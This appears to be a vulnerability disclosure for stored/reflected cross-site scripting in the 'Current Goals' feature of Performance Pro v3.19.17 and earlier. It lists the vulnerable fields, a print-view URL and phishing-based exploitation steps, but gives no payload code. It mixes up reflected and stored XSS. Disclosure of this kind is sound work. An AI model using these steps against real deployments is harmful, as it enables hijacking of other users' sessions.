❗Reflected XSS - Current Goals

Reflected XSS (authenticated)

Performance Pro v3.19.17 and earlier is affected by multiple Stored Cross-Site Scripting (XSS) vulnerabilities (Persistent/Type II) via POST requests to:

Description

The application is vulnerable to multiple instances of stored (persistent) XSS in the Current Goals functionality. Malicious input provided by an authenticated user is stored server-side and later rendered into the DOM without proper encoding or sanitization. This allows execution of arbitrary JavaScript in the context of any user viewing the affected pages.

Affected Endpoints and Parameters:

Input (create/update goal): Vulnerable fields:

• Goal Name

• Goal Notes (name field)

• Action Step Name

• Notes Name

Reflected when viewing/printing goals: GET /viewgoals.php?printview=1&type=current Vulnerable fields:

• Goal Name

• Goal Description

• Action Step Description

Exploitation

• Inject malicious javascript into any of the following input fields for current goals.

  • Goal Name

  • Goal Description

  • Action Steps Name

  • Action Steps Description

  • Note Name

• Send the crafted URL to a victim via phishing, social engineering, or any other attack vector.

• When the victim navigates to the modified URL, the application reflects the malicious input directly into the browser without sufficient sanitization.

• The victim’s browser renders the injected payload in the error message, allowing arbitrary script execution within the victim's browser.

Example 1 - XSS in Updating/Creating Current Goals

• Any of the highlighted fields are vulnerable to XSS between the Update/Creation

• Action Steps injection

• Notes injection

• Successful XSS exploitation

Example 2 - XSS in View/Print of Current Goals

• Any of the highlighted fields are vulnerable to XSS in the View/Print URL

• Successful XSS exploitation